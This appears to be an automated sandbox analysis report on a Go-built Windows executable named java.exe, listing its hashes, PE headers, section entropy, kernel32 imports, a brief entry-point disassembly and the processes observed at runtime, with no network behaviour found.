                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:java.exe
                                                                                                                                                                      File size:32'847'872 bytes
                                                                                                                                                                      MD5:422a5d9f38ad412abef13439d5e0e632
                                                                                                                                                                      SHA1:673ec8a109e80f54e9efebe45566201c7d16ed18
                                                                                                                                                                      SHA256:9f015bb5d3e290b311c6e66cd5c597b7bdca42066faa46d047bcc6eb418cfdd7
                                                                                                                                                                      SHA512:a1b91657f524c0aa72316b6de949ad8878b7021161712bc2d524d7fb0b69fec23e940fd46d2c0e136b57c50847d39274b044051cd042b0d2c2dcdd429064ac13
                                                                                                                                                                      SSDEEP:393216:zEesJbmLhuLumjmy3v1tZRULheEo0HHjD03LcLio:g4huSmjNRUdfHjDqgd
                                                                                                                                                                      TLSH:60776B43F8A2C094C5988630C6A6D2D37A7178854B2557C73BECAF3E2FB2BD0567A714
                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d............h....".......|...................@..............................0............`... ............................
                                                                                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                                                                                      Entrypoint:0x46c4e0
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows cui
                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                      Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                      OS Version Minor:1
                                                                                                                                                                      File Version Major:6
                                                                                                                                                                      File Version Minor:1
                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                                                      Import Hash:4f2f006e2ecf7172ad368f8289dc96c1
                                                                                                                                                                      Instruction
                                                                                                                                                                      jmp 00007EFFF8690FC0h
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      int3
                                                                                                                                                                      pushfd
                                                                                                                                                                      cld
                                                                                                                                                                      dec eax
                                                                                                                                                                      sub esp, 000000E0h
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov dword ptr [esp], edi
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov dword ptr [esp+08h], esi
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov dword ptr [esp+10h], ebp
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov dword ptr [esp+18h], ebx
                                                                                                                                                                      dec esp
                                                                                                                                                                      mov dword ptr [esp+20h], esp
                                                                                                                                                                      dec esp
                                                                                                                                                                      mov dword ptr [esp+28h], ebp
                                                                                                                                                                      dec esp
                                                                                                                                                                      mov dword ptr [esp+30h], esi
                                                                                                                                                                      dec esp
                                                                                                                                                                      mov dword ptr [esp+38h], edi
                                                                                                                                                                      movups dqword ptr [esp+40h], xmm6
                                                                                                                                                                      movups dqword ptr [esp+50h], xmm7
                                                                                                                                                                      inc esp
                                                                                                                                                                      movups dqword ptr [esp+60h], xmm0
                                                                                                                                                                      inc esp
                                                                                                                                                                      movups dqword ptr [esp+70h], xmm1
                                                                                                                                                                      inc esp
                                                                                                                                                                      movups dqword ptr [esp+00000080h], xmm2
                                                                                                                                                                      inc esp
                                                                                                                                                                      movups dqword ptr [esp+00000090h], xmm3
                                                                                                                                                                      inc esp
                                                                                                                                                                      movups dqword ptr [esp+000000A0h], xmm4
                                                                                                                                                                      inc esp
                                                                                                                                                                      movups dqword ptr [esp+000000B0h], xmm5
                                                                                                                                                                      inc esp
                                                                                                                                                                      movups dqword ptr [esp+000000C0h], xmm6
                                                                                                                                                                      inc esp
                                                                                                                                                                      movups dqword ptr [esp+000000D0h], xmm7
                                                                                                                                                                      inc ebp
                                                                                                                                                                      xorps xmm7, xmm7
                                                                                                                                                                      dec ebp
                                                                                                                                                                      xor esi, esi
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov eax, dword ptr [01759C6Eh]
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                                                      dec eax
                                                                                                                                                                      cmp eax, 00000000h
                                                                                                                                                                      je 00007EFFF86948C5h
                                                                                                                                                                      dec esp
                                                                                                                                                                      mov esi, dword ptr [eax]
                                                                                                                                                                      dec eax
                                                                                                                                                                      sub esp, 10h
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov eax, ecx
                                                                                                                                                                      dec eax
                                                                                                                                                                      mov ebx, edx
                                                                                                                                                                      call 00007EFFF8676A1Fh
                                                                                                                                                                      dec eax
                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1dd50000x516.idata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x17d50000x33318.pdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1dd60000x26888.reloc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x16f0e200x170.data
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      .text0x10000x7cef4b0x7cf0001023a7a46282f9561d8b77e4767dc8fbunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .rdata0x7d00000xf1f2300xf1f400e8f2568139bca593d4764aac6b5371daunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .data0x16f00000xe4dd00x7e600f3460fc8bb57641b8c6ddd2b485d908bFalse0.42814006862017806DIY-Thermocam raw data (Lepton 2.x), scale 14605-256, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 2.000000, slope 8796369846272.0000005.318670049139262IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .pdata0x17d50000x333180x33400abc09d2705429987c15398e55c572222False0.3967559070121951data5.8620325472459935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .xdata0x18090000xa80x200673eb0cb30fca49fc02d73a2fcc681bcFalse0.19921875data1.6345075234569126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      /40x180a0000x1290x20017f62672c8506464ae13eccc2eb6cb94False0.623046875data5.081946473254993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      /190x180b0000x12e0050x12e20001b23c6136e8911987dfae87c8227f11False0.9995200015515101data7.997247706033553IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      /320x193a0000x4cd120x4ce00cd8c62b9fb07e321af7a10105ad8dd54False0.990380462398374data7.93213107915372IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      /460x19870000x490x20084c751f3e19877c45a9ada9d848eda33False0.150390625data1.2003492521608754IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      /650x19880000x23bb910x23bc000d8fcc3625e6b1891e6e0df27cb03401unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      /780x1bc40000x1a47b80x1a4800c6a31547b69d95b4ee4611ab4943ba86False0.9902628242048157data7.996749168987926IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      /900x1d690000x6b2250x6b400b51f9df911b8c2bd223f4082b7405de9False0.962854203088578data7.827136966032965IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .idata0x1dd50000x5160x600cd03284480cdbbfa6b7c83a1689d2de8False0.3645833333333333data4.033479491869941IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .reloc0x1dd60000x268880x26a000e1af7257b45d3f6be229af4ae54dc30False0.17726031553398058data5.45760472128724IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .symtab0x1dfd0000x1c54a60x1c560063b4a7b53ba0e5e05c0e9e56b41ac1d4False0.15414448063137579data5.358536291121537IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      DLLImport
                                                                                                                                                                      kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
                                                                                                                                                                      No network behavior found

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:03:42:03
                                                                                                                                                                      Start date:25/04/2024
                                                                                                                                                                      Path:C:\Users\user\Desktop\java.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\java.exe"
                                                                                                                                                                      Imagebase:0x310000
                                                                                                                                                                      File size:32'847'872 bytes
                                                                                                                                                                      MD5 hash:422A5D9F38AD412ABEF13439D5E0E632
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:Go lang
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:1
                                                                                                                                                                      Start time:03:42:03
                                                                                                                                                                      Start date:25/04/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      No disassembly